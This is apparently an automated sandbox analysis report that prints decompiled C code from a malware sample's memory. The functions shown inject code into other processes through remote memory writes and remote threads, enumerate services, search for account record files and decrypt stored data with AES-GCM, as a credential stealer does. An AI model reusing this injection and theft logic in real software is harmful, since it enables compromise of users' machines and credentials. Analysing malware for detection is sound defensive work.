					if(_t49 != 0 || 0x100000 != 0) {
						_v12 = 0;
						E0040FD0D(_t91, 0x100000, _t49, 0x100000,  &_v12,  &_v12);
						_t76 = E0040FBB4(_t91, 0x100, 0x33370000, 0);
						_v20 = _t76;
						_v16 = 0x100;
						if(_t76 != 0 || 0x100 != 0) {
							_v8 = 0;
							if(E0040FAE9(_t91, "XXXXXX", _v20, _v16, E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
								goto L22;
							} else {
								_t90 = _v24;
								_v8 = _v8 & 0x00000000;
								_t80 = _t91;
								if(E0040FAE9(_t80, 0x41c2a8, _v24, 0x100000, 0x2412,  &_v8) == 0 || _v8 != 0x2412) {
									goto L22;
								} else {
									MessageBoxA(0, "Injecting64", "Debug", 0);
									_push(_t80);
									_push(_t80);
									asm("cdq");
									return E0040FC62(0x41c2a8, _t91, 0x41c2a8, _t90, 0x100000);
								}
							}
						} else {
							goto L23;
						}
					} else {
						goto L23;
					}
				} else {
					return _t33 | 0xffffffff;
				}
			}


















                                  0x00407b3e
                                  0x00407b47
                                  0x00407b47
                                  0x00407b59
                                  0x00407b5f
                                  0x00407b63
                                  0x00407b76
                                  0x00407b80
                                  0x00407c99
                                  0x00407caf
                                  0x00407cb3
                                  0x00407d56
                                  0x00407d56
                                  0x00407d58
                                  0x00407d58
                                  0x00000000
                                  0x00407d58
                                  0x00407cb9
                                  0x00407cca
                                  0x00407ce2
                                  0x00407ce4
                                  0x00407ce9
                                  0x00000000
                                  0x00000000
                                  0x00407ceb
                                  0x00407cf3
                                  0x00407d0d
                                  0x00407d52
                                  0x00407d52
                                  0x00000000
                                  0x00407d1b
                                  0x00407d2d
                                  0x00407d38
                                  0x00000000
                                  0x00407d43
                                  0x00000000
                                  0x00407d4a
                                  0x00407d38
                                  0x00407d0d
                                  0x00407b86
                                  0x00407b89
                                  0x00407b93
                                  0x00000000
                                  0x00000000
                                  0x00407b99
                                  0x00407b9a
                                  0x00407ba4
                                  0x00407bac
                                  0x00407bb3
                                  0x00407bc0
                                  0x00407bc9
                                  0x00407be2
                                  0x00407be7
                                  0x00407bec
                                  0x00407bf1
                                  0x00407bfe
                                  0x00407c23
                                  0x00000000
                                  0x00407c39
                                  0x00407c39
                                  0x00407c3f
                                  0x00407c50
                                  0x00407c5c
                                  0x00000000
                                  0x00407c6f
                                  0x00407c7d
                                  0x00407c83
                                  0x00407c84
                                  0x00407c88
                                  0x00000000
                                  0x00407c91
                                  0x00407c5c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407b65
                                  0x00000000
                                  0x00407b65

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00407B59
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • GetCurrentProcess.KERNEL32 ref: 00407B6D
                                    • Part of subcall function 004121DC: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                    • Part of subcall function 004121DC: GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  • MessageBoxA.USER32 ref: 00407C7D
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 00407CAD
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407CCA
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407CE2
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407D05
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,0041E6C0,00001D44,?), ref: 00407D30
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407D4A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocCurrentMemoryWrite$AddressCreateHandleHeapMessageModuleOpenProcProtectRemoteThreadWow64
                                  • String ID: Debug$Injecting64$XXXXXX
                                  • API String ID: 1574360354-2389424830
                                  • Opcode ID: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction ID: d433ea0d1c2d4f6ec0602b92d9002377d3576233aac0b38f39bcf27655b0c8a4
                                  • Opcode Fuzzy Hash: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                  • Instruction Fuzzy Hash: 21519271E04205BBEB21A7618C45FBF7A7DEF85714F20417EF500B22D0E7B8AA45866E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413F7F, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81injectionmemorythreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00413F7F(long __edx) {
				void* _v8;
				long _v12;
				char _v268;
				void _v272;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t37;

				_t33 = OpenProcess(0x1fffff, 0, __edx);
				_v8 = _t33;
				_v272 = GetCurrentProcessId();
				_t35 = E00401085(0xff);
				GetModuleFileNameA(0, _t13, 0xff);
				E004011A4( &_v268, _t35);
				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_t33, _t27,  &E00426208, 0x800, 0);
				_t5 =  &_v8; // 0x413f7a
				VirtualProtectEx( *_t5, _t27, 0x800, 0x40,  &_v12);
				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
				_t9 = _t27 + 0x10e; // 0x10e
				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
				 *0x559cb4 = _t25;
				return _t25;
			}











                                  0x00413f99
                                  0x00413f9b
                                  0x00413fa9
                                  0x00413fb7
                                  0x00413fbc
                                  0x00413fca
                                  0x00413ff4
                                  0x00413ffe
                                  0x0041400c
                                  0x0041400f
                                  0x0041402a
                                  0x0041403c
                                  0x00414040
                                  0x0041404f
                                  0x00414057
                                  0x0041405e

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,74A313FB,00000000), ref: 00413F93
                                  • GetCurrentProcessId.KERNEL32 ref: 00413F9E
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00413FBC
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 00413FE6
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,00426208,00000800,00000000), ref: 00413FFE
                                  • VirtualProtectEx.KERNEL32(z?A,00000000,00000800,00000040,?), ref: 0041400F
                                  • VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 00414026
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,00000103,00000000), ref: 0041403C
                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0041404F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                  • String ID: z?A
                                  • API String ID: 900395357-4280446894
                                  • Opcode ID: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction ID: b1c18d8d0f2f4188799d6c91686f228e56c1b6c845ed563d7edeb039f8378cf2
                                  • Opcode Fuzzy Hash: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                  • Instruction Fuzzy Hash: A1216F71644218BEF7209B51DC4AFEB7F7CEB44720F2041B6B604AA0D0DAF46E408AA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8FB, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167servicestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E0040D8FB(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					E00405FEB(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E00406045(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E004036F7( &_v12,  *_t91);
						if(E0040335A( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E00403549( &_v24, E004036F7( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							E00405FEB(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							E00405FEB(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E004036F7( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E004036F7(_t119,  *_t112);
										E0040221A(_t92 + 0x44,  &_v12);
									}
									E00405FEB(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E0040D33C(_v32, 2);
							E0040D3A8(_v32);
							_v36 = 1;
							E00401099(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						E00405FEB(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}


























                                  0x0040d906
                                  0x0040d910
                                  0x0040d913
                                  0x0040d916
                                  0x0040d919
                                  0x0040d91c
                                  0x0040d91f
                                  0x0040d928
                                  0x0040d92c
                                  0x0040d9dc
                                  0x0040d9dc
                                  0x0040d9e0
                                  0x0040d9e3
                                  0x0040d9ef
                                  0x0040d9ef
                                  0x0040d935
                                  0x0040d93c
                                  0x0040d93f
                                  0x0040d93f
                                  0x0040d949
                                  0x0040d959
                                  0x0040d95f
                                  0x0040d964
                                  0x0040d96b
                                  0x0040d975
                                  0x0040d982
                                  0x0040d98a
                                  0x00000000
                                  0x00000000
                                  0x0040d99a
                                  0x0040d9a0
                                  0x0040d9a5
                                  0x00000000
                                  0x00000000
                                  0x0040d9a7
                                  0x0040d9a9
                                  0x0040d9b3
                                  0x0040d9c5
                                  0x0040d9f0
                                  0x0040da02
                                  0x0040da0a
                                  0x0040da0f
                                  0x0040da19
                                  0x0040da1d
                                  0x0040da20
                                  0x0040da25
                                  0x0040da2d
                                  0x0040da70
                                  0x0040da73
                                  0x0040da77
                                  0x00000000
                                  0x00000000
                                  0x0040da7d
                                  0x0040da8c
                                  0x0040dac9
                                  0x0040dac9
                                  0x0040daca
                                  0x0040dacf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040dad1
                                  0x0040da93
                                  0x0040daa6
                                  0x0040daad
                                  0x0040dab5
                                  0x0040dab5
                                  0x0040dabd
                                  0x0040dac2
                                  0x0040dac6
                                  0x00000000
                                  0x0040dac6
                                  0x00000000
                                  0x0040da7d
                                  0x0040da35
                                  0x00000000
                                  0x00000000
                                  0x0040da3d
                                  0x0040da43
                                  0x0040da49
                                  0x0040da4c
                                  0x0040da61
                                  0x0040da65
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040da6b
                                  0x0040d9ca
                                  0x0040d9cf
                                  0x0040d9d3
                                  0x0040d9d6
                                  0x0040d9da
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d9da
                                  0x00000000
                                  0x0040d9a9
                                  0x00000000

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040D922
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040D959
                                    • Part of subcall function 00406045: GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 00406048
                                    • Part of subcall function 00406045: HeapAlloc.KERNEL32(00000000,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 0040604F
                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040D982
                                  • GetLastError.KERNEL32 ref: 0040D98C
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D99A
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DA5B
                                  • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DA9E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: EnumHeapManagerOpenServicesStatus$AllocCloseErrorHandleLastProcessServicelstrcmp
                                  • String ID: ServicesActive
                                  • API String ID: 4046592027-3071072050
                                  • Opcode ID: b633b8ffea87f903bef74cbbdf891376d23df45501ecfc6c39199a654e4b1ae1
                                  • Instruction ID: 4627b5c660ce4a60c95ced9edd5d001cb4fcdfcb4ede8c399349bdd6508d6144
                                  • Opcode Fuzzy Hash: b633b8ffea87f903bef74cbbdf891376d23df45501ecfc6c39199a654e4b1ae1
                                  • Instruction Fuzzy Hash: 85511CB1D00219AFDB15DFE1C896BEFBBB8AF18305F10017AE502B62D1DB785A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407D5E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97injectionmemorythreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00407D5E(void* __ecx, long __edx, long _a4) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				signed int _t17;
				void* _t19;
				void* _t22;
				long _t32;
				_Unknown_base(*)()* _t38;
				void* _t40;

				_t32 = __edx;
				_v24 = __ecx;
				if( *0x426754 == 0) {
					 *0x426754 = E0040FB98() != 0;
				}
				_t17 = OpenProcess(0x1fffff, 0, _a4);
				_t40 = _t17;
				if(_t40 != 0) {
					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
					if(_t38 == 0) {
						L12:
						_push(0xfffffffe);
						L13:
						_pop(_t19);
						L14:
						return _t19;
					}
					_v16 = _v16 & 0x00000000;
					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16);
					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
					_v20 = _t22;
					if(_t22 == 0) {
						goto L12;
					}
					_v8 = _v8 & 0x00000000;
					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
						L11:
						_push(0xfffffffd);
						goto L13;
					} else {
						_v12 = _v12 & 0x00000000;
						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
							goto L11;
						} else {
							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0);
							goto L14;
						}
					}
				} else {
					return _t17 | 0xffffffff;
				}
			}














                                  0x00407d6d
                                  0x00407d6f
                                  0x00407d72
                                  0x00407d7b
                                  0x00407d7b
                                  0x00407d8c
                                  0x00407d92
                                  0x00407d96
                                  0x00407db6
                                  0x00407dba
                                  0x00407e5f
                                  0x00407e5f
                                  0x00407e61
                                  0x00407e61
                                  0x00407e62
                                  0x00000000
                                  0x00407e62
                                  0x00407dc0
                                  0x00407dd1
                                  0x00407de9
                                  0x00407def
                                  0x00407df4
                                  0x00000000
                                  0x00000000
                                  0x00407df6
                                  0x00407e1b
                                  0x00407e5b
                                  0x00407e5b
                                  0x00000000
                                  0x00407e2d
                                  0x00407e2d
                                  0x00407e43
                                  0x00000000
                                  0x00407e4a
                                  0x00407e53
                                  0x00000000
                                  0x00407e53
                                  0x00407e43
                                  0x00407d98
                                  0x00000000
                                  0x00407d98

                                  APIs
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407D8C
                                    • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                    • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                    • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407DB0
                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407DD1
                                  • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407DE9
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407E13
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407E3B
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407E53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                  • String ID: XXXXXX
                                  • API String ID: 813767414-582547948
                                  • Opcode ID: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction ID: c495f5495fef9a669d461779a70b0afaaa39668d7629f65417ca4a490480110a
                                  • Opcode Fuzzy Hash: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                  • Instruction Fuzzy Hash: 26219371A49205BAEB2157A0DC05FBF7A7CAF44B55F2041B6FA10F11D0D7B8AE0086BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040955B, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040955B(intOrPtr __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				intOrPtr _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x426760, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x426760,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E00409244(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}









                                  0x0040957a
                                  0x0040957c
                                  0x0040959b
                                  0x004095b1
                                  0x004095b6
                                  0x004095b8
                                  0x004095c4
                                  0x004095e2
                                  0x004095f1
                                  0x004095fc
                                  0x004095fc
                                  0x0040960f
                                  0x004095b8
                                  0x00409619

                                  APIs
                                  • GetFullPathNameA.KERNEL32(00426760,00000104,?,00000000), ref: 0040957C
                                  • PathCombineA.SHLWAPI(?,?,00418F18), ref: 0040959B
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004095AB
                                  • PathCombineA.SHLWAPI(?,00426760,0000002E), ref: 004095E2
                                  • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004095F1
                                    • Part of subcall function 00409244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                    • Part of subcall function 00409244: GetLastError.KERNEL32 ref: 0040926E
                                    • Part of subcall function 00409244: CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00409609
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                  • String ID: .$Accounts\Account.rec0
                                  • API String ID: 3873318193-2526347284
                                  • Opcode ID: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction ID: bc3515f8d3d8780f40bb8a30baa7d5921dca78d5fe5a5665ce25a30cdb5b99d6
                                  • Opcode Fuzzy Hash: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                  • Instruction Fuzzy Hash: A71142B2A0022C6BDB20D7A4DC89FEB777CEB45714F5045E7E505E3181E7789E888E68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C419, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                  • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                  • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                  • String ID: AES$ChainingMode$ChainingModeGCM
                                  • API String ID: 1692524283-1213888626
                                  • Opcode ID: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction ID: c2b106cd844a06e10b1a571c349fc797866018eb450a69ea0d76d9719a4b7e57
                                  • Opcode Fuzzy Hash: dcef71b3dcc6bd3a3947520fdd90713a2cd90525b873c444abc0fdd3c8c30a01
                                  • Instruction Fuzzy Hash: 2FF06871345325BFDB240B56DC49ED7BFACEF5AB91B10413AF905E1150D6B15C00D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C6BD, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040C6BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v10;
				char _v12;
				long _v16;
				char _v20;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				void* _t36;
				long _t50;
				void* _t54;
				int _t61;
				void* _t63;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t63 = __ecx;
				_t73 = __edx;
				_v12 = 0x3176;
				_v10 = 0x30;
				_t75 = __ecx;
				if(__edx < 3) {
					L8:
					_push(_t63);
					_push( &_v16);
					_push( &_v20);
					_t36 = E0040C1DD(_t75, _t73, __eflags);
					__eflags = _t36;
					if(_t36 != 0) {
						_t76 = E00401085(_v16 + 1);
						__eflags = _v16 + 1;
						E00401052(_t76, 0, _v16 + 1);
						E0040102C(_t76, _v20, _v16);
						_push(_v20);
						goto L10;
					}
				} else {
					_t36 = E00401000(__ecx,  &_v12, 3);
					_t77 = _t77 + 0xc;
					if(_t36 != 0) {
						goto L8;
					} else {
						if(_a4 != _t36 && _a8 != _t36) {
							_t61 = 0x40;
							E00401052( &_v88, _t36, _t61);
							_t7 = _t75 + 3; // 0x3
							_v88 = _t61;
							_v80 = _t7;
							_t10 = _t73 - 0x10; // -16
							_v84 = 1;
							_v76 = 0xc;
							_v64 = _t10 + _t75;
							_t14 = _t73 - 0x1f; // -31
							_t50 = _t14;
							_v60 = 0x10;
							_v16 = _t50;
							_t36 = LocalAlloc(_t61, _t50);
							_t74 = _t36;
							if(_t74 != 0) {
								_t54 = _v80 + _v76;
								__imp__BCryptDecrypt(_a8, _t54, _v16,  &_v88, 0, 0, _t74, _v16,  &_v16, 0);
								if(_t54 != 0) {
									return 0x418fe6;
								}
								_t76 = E00401085(_v16 + 1);
								E00401052(_t76, 0, _v16 + 1);
								E0040102C(_t76, _t74, _v16);
								_push(_t74);
								L10:
								LocalFree();
								return _t76;
							}
						}
					}
				}
				return _t36;
			}























                                  0x0040c6bd
                                  0x0040c6c6
                                  0x0040c6c8
                                  0x0040c6ce
                                  0x0040c6d2
                                  0x0040c6d7
                                  0x0040c7b0
                                  0x0040c7b0
                                  0x0040c7b6
                                  0x0040c7bc
                                  0x0040c7c0
                                  0x0040c7c8
                                  0x0040c7ca
                                  0x0040c7da
                                  0x0040c7dc
                                  0x0040c7e1
                                  0x0040c7f0
                                  0x0040c7f8
                                  0x00000000
                                  0x0040c7f8
                                  0x0040c6dd
                                  0x0040c6e4
                                  0x0040c6e9
                                  0x0040c6ee
                                  0x00000000
                                  0x0040c6f4
                                  0x0040c6f7
                                  0x0040c708
                                  0x0040c70f
                                  0x0040c714
                                  0x0040c717
                                  0x0040c71a
                                  0x0040c720
                                  0x0040c723
                                  0x0040c72c
                                  0x0040c733
                                  0x0040c736
                                  0x0040c736
                                  0x0040c73b
                                  0x0040c742
                                  0x0040c745
                                  0x0040c74b
                                  0x0040c74f
                                  0x0040c76c
                                  0x0040c773
                                  0x0040c77b
                                  0x00000000
                                  0x0040c7a9
                                  0x0040c78b
                                  0x0040c791
                                  0x0040c79e
                                  0x0040c7a6
                                  0x0040c7fb
                                  0x0040c7fb
                                  0x00000000
                                  0x0040c801
                                  0x0040c74f
                                  0x0040c6f7
                                  0x0040c6ee
                                  0x0040c807

                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                  • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • LocalFree.KERNEL32(?), ref: 0040C7FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                  • String ID: 0$v1
                                  • API String ID: 4131498132-3331332043
                                  • Opcode ID: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction ID: 2970a0a6e6da2b46dc71b506d453e3d8838dace9638eca7dbf8707eb64b33263
                                  • Opcode Fuzzy Hash: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction Fuzzy Hash: 064160B2D00108BBDB01ABD5DC85EEFB7BCEF44344F14813BF911A2290E7389A458B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041405F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041405F(void* __ecx, void* __eflags) {
				char _v264;
